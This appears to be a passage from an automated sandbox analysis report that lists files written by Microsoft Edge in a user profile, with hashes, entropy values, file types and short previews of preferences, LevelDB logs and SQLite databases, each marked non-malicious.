Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17449), with no line terminators
Category:	dropped
Size (bytes):	17455
Entropy (8bit):	5.497380290441422
Encrypted:	false
SSDEEP:	384:stPPGQSu4IsQbhXOKduBkWDpsJiRTZobGtQwhNf7NIE:s1OXubbh1bGeCX
MD5:	58B9BE48C7BA9FDCFECCE6BA5914C269
SHA1:	2A786EA1E752870A1C81A2ECBBFC35CABB988E81
SHA-256:	7A1A3146FF2B72C225CAFE43FB33894DECEFA509FD5F0951A1242E09390D2C07
SHA-512:	F14D4EE4AD50EC6C6513B4176203D06C33E73D6A54E946AFB87ADBB324CB451A1FFF6E03114D686A52745DB07CC5B3C8F002CA93C5156AC59589861C997C6D48
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377353272098661","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9d012d7c-0229-47bb-81d2-8042292a7283.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	307
Entropy (8bit):	5.267732707160788
Encrypted:	false
SSDEEP:	6:HMXRM1CHhJ23oH+Tcwtp3hBtB2KLlVMiq2PCHhJ23oH+Tcwtp3hBWsIFUv:sBAYebp3dFLkivBYebp3eFUv
MD5:	11DA544A1BDE806ADB80D22C2196E3A2
SHA1:	50EEFBBF132CB1CA093174157F58E93A3ABD8352
SHA-256:	729A62D1874162F43B7B1AA8C6F6A1A6F5FFC1B72A90C0DCE0AAF4E224334A34
SHA-512:	44795C4E91227E70E5A1F2647FDD7F16FBE96EABC034C62F9E48950DA42515E1F168EF25C8CB077B76104311EFE7F78D87578CB8406F23B0EFDCAF66CD589446
Malicious:	false
Preview:	2024/11/29-06:27:56.165 5e4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/29-06:27:56.201 5e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	1764710
Entropy (8bit):	5.13811555443082
Encrypted:	false
SSDEEP:	24576:hKPDfKfgXaHbMhFQlmADAbpENUdifYOBHbc2r:hKrfqJmcx
MD5:	51FBBD966AAFDE9BFA1B787C22B974AE
SHA1:	AA5396872107BB40BD2451F81C5DE2B3C6A2160F
SHA-256:	5C071E16B9FEF2AF85C0BF70DDB58CA12C8D3CB9CECCF0A3ED675A505C8789B5
SHA-512:	557013490CB5911E8E06C6C9C8FC718B71B098C5163F509742C3DF82C4EFB3FEE031301CEC8CD83E7CFC1303A1722620E5857AD22D79AD674A66D037117252DE
Malicious:	false
Preview:	...m.................DB_VERSION.1.Go..................QUERY_TIMESTAMP:arbitration_priority_list4...13340967444415546.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.149478999390826
Encrypted:	false
SSDEEP:	6:HM8q2PCHhJ23oH+Tcwt9Eh1tIFUt8YMD1Zmw+YMPkwOCHhJ23oH+Tcwt9Eh15LJ:s8vBYeb9Eh16FUt83D1/+3P56Yeb9Ehx
MD5:	08628F39F635C11FC330BC4B5B36D292
SHA1:	4D7E414B2EFD0EA65534668CB221C2A2C0C35A99
SHA-256:	3C8F2B89EE6CF8C9FABC76E2F8B6211F35CFEA98FC6E9B89321F53A60A66F983
SHA-512:	1F20F0E939CA200FAAF5A7C5DF1C3BBD8C6AC72EA226C9B1BF31729366242CBE522261C4172EC32FB3AB5C4C144962B501A8C464DB5875FC65569840CAD4C236
Malicious:	false
Preview:	2024/11/29-06:27:56.122 2060 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/29-06:27:56.126 2060 Recovering log #3.2024/11/29-06:27:56.135 2060 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.149478999390826
Encrypted:	false
SSDEEP:	6:HM8q2PCHhJ23oH+Tcwt9Eh1tIFUt8YMD1Zmw+YMPkwOCHhJ23oH+Tcwt9Eh15LJ:s8vBYeb9Eh16FUt83D1/+3P56Yeb9Ehx
MD5:	08628F39F635C11FC330BC4B5B36D292
SHA1:	4D7E414B2EFD0EA65534668CB221C2A2C0C35A99
SHA-256:	3C8F2B89EE6CF8C9FABC76E2F8B6211F35CFEA98FC6E9B89321F53A60A66F983
SHA-512:	1F20F0E939CA200FAAF5A7C5DF1C3BBD8C6AC72EA226C9B1BF31729366242CBE522261C4172EC32FB3AB5C4C144962B501A8C464DB5875FC65569840CAD4C236
Malicious:	false
Preview:	2024/11/29-06:27:56.122 2060 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/29-06:27:56.126 2060 Recovering log #3.2024/11/29-06:27:56.135 2060 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4628868643211053
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuhe:TouQq3qh7z3bY2LNW9WMcUvBuhe
MD5:	F6163B6A1A38818423399AFBFC804D17
SHA1:	DC720A38151F7E5BAD82611412C9C5A365D6DB19
SHA-256:	1ED6F008279F6E9FBEA15B8D5D14A5E05FAC8BF7466A5DAED339E4C263066E6D
SHA-512:	153CA01BBC0D9F939396745F56177E118321456B1E0A75E09ABD95A7BB2D51C4D30460FA3C6581177E3846C6954041BAA224BCDD117723257C8EA0E36247DE32
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.280712826002396
Encrypted:	false
SSDEEP:	6:HMbLBe+q2PCHhJ23oH+TcwtnG2tMsIFUt8YMbLBLZmw+YMbLBQdN9VkwOCHhJ23p:svBPvBYebn9GFUt83vBL/+3vBE56YebB
MD5:	B090C16F27EBD40564BF4F29FE57B14F
SHA1:	0199A87F0520228F77FCCFC17A9160BF11581819
SHA-256:	17964765A2035A0D986B3DBB86DEE25C3CD93630D271BF6C72941CC9EA89C687
SHA-512:	34EC273351078069AD1629607FB7D6B5F3A9A5B4B826FB3F3DE272CB70D472DE2649D7873D6ABED1163FD79511AC5E23C043B12D3DE00652C49D21350C6F27B3
Malicious:	false
Preview:	2024/11/29-06:27:51.246 dc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/29-06:27:51.247 dc8 Recovering log #3.2024/11/29-06:27:51.248 dc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.280712826002396
Encrypted:	false
SSDEEP:	6:HMbLBe+q2PCHhJ23oH+TcwtnG2tMsIFUt8YMbLBLZmw+YMbLBQdN9VkwOCHhJ23p:svBPvBYebn9GFUt83vBL/+3vBE56YebB
MD5:	B090C16F27EBD40564BF4F29FE57B14F
SHA1:	0199A87F0520228F77FCCFC17A9160BF11581819
SHA-256:	17964765A2035A0D986B3DBB86DEE25C3CD93630D271BF6C72941CC9EA89C687
SHA-512:	34EC273351078069AD1629607FB7D6B5F3A9A5B4B826FB3F3DE272CB70D472DE2649D7873D6ABED1163FD79511AC5E23C043B12D3DE00652C49D21350C6F27B3
Malicious:	false
Preview:	2024/11/29-06:27:51.246 dc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/29-06:27:51.247 dc8 Recovering log #3.2024/11/29-06:27:51.248 dc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6144998293390287
Encrypted:	false
SSDEEP:	12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWFrPMAqzrgc:TLapR+DDNzWjJ0npnyXKUO8+jEzpGUmL
MD5:	737D55835F24CECC1B75DBC6AC47014C
SHA1:	2B77F91C29BACE8266B683B1C783EE6071078737
SHA-256:	AFF461F2DB6F72FC18B317F52FB47FF7EB03A319F33048F40126744CDFD7AF69
SHA-512:	561B1168FC2247B991FD7DE6AC33EF6FF8F29BA2AE1D57C373F88EA3D67CF8D7518C138E546FFF9FF0E18CB7378024FA884CEABD3BB2ED90151148F37AFBB00B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354039168136695
Encrypted:	false
SSDEEP:	6144:MA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:MFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	0E8C2725A6F25DF7B0F001B04780900F
SHA1:	5243EB84DE87630B665512E836BD8DB17FF245D5
SHA-256:	343A8A834E30D2A3DF76130419E594859409A046CFC139FDEE26B54F56152144
SHA-512:	30A6D794CE4D78690073531B91809927450106387D472982065816797E80574633F5CB2FB2A35DC1B8C0334E80E42A2FFAF353086A93C5BE588941C77471352C
Malicious:	false
Preview:	...m.................DB_VERSION.12p6q...............&QUERY_TIMESTAMP:domains_config_gz2...13377353279920581..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]...`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	311
Entropy (8bit):	5.192394661319
Encrypted:	false
SSDEEP:	6:HMD71CHhJ23oH+Tcwtk2WwnvB2KLlVM1i+q2PCHhJ23oH+Tcwtk2WwnvIFUv:sDHYebkxwnvFLk1i+vBYebkxwnQFUv
MD5:	96EB1920420C5C899C82FFF3AE9EC299
SHA1:	B0457D7168543391796A2EB3D78FA55747C50261
SHA-256:	55DB6328DEBB6ED5EC8EA330583BA80DA3CE9663EE8793135455A9EF33E224E6
SHA-512:	2E55F3E5B084C2A29C5146CEB9B514E9F3B325286F0F9308751CBA98E257D9066F687681552A3FCCBC8E40CE1667CCC0753590F70ED6BE7C929E332B332C5387
Malicious:	false
Preview:	2024/11/29-06:27:56.126 207c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/29-06:27:56.161 207c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.324624490825437
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Ra:C1gAg1zfvy
MD5:	6D81DCD2CE7A63B05FA7AE8D45E0253E
SHA1:	3886E071F6838C40AD903D49FF75DB134598FBFF
SHA-256:	C580DFA993A7DDD35B63582493ED1B34E033EF181B876443F9332DEB467960C6
SHA-512:	B0AC7E485DC28B71DB04F538440AF6D9C1832AC2D83FF35E994A162AD574E18C8511EF2F46B3EEDE189B9B2A1EE31F59EC8C6203B5441A71BFCC8DC185E6B6E2
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.274225599675079
Encrypted:	false
SSDEEP:	6:HMbL7P+q2PCHhJ23oH+Tcwt8aPrqIFUt8YMbL7PZmw+YMbL7dSVkwOCHhJ23oH+o:svSvBYebL3FUt83vb/+3v056YebQJ
MD5:	547CD24903333532525F8F735A1816B2
SHA1:	467905683B3475E9A0CD8674B2EA7141FDF545B2
SHA-256:	E0E19964989E30F6FCB6C7ADA36AD8BA3925753D4C0780C8FDE2EE234D22B2D8
SHA-512:	D3A016A901582D6BA559265811AE384FBFC8DC7913125E07253901168B671004312D3252CCDCC67F14E581197517CE301333073F4C498086486699DB4C151DEF
Malicious:	false
Preview:	2024/11/29-06:27:51.047 7b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/29-06:27:51.047 7b8 Recovering log #3.2024/11/29-06:27:51.048 7b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.274225599675079
Encrypted:	false
SSDEEP:	6:HMbL7P+q2PCHhJ23oH+Tcwt8aPrqIFUt8YMbL7PZmw+YMbL7dSVkwOCHhJ23oH+o:svSvBYebL3FUt83vb/+3v056YebQJ
MD5:	547CD24903333532525F8F735A1816B2
SHA1:	467905683B3475E9A0CD8674B2EA7141FDF545B2
SHA-256:	E0E19964989E30F6FCB6C7ADA36AD8BA3925753D4C0780C8FDE2EE234D22B2D8
SHA-512:	D3A016A901582D6BA559265811AE384FBFC8DC7913125E07253901168B671004312D3252CCDCC67F14E581197517CE301333073F4C498086486699DB4C151DEF
Malicious:	false
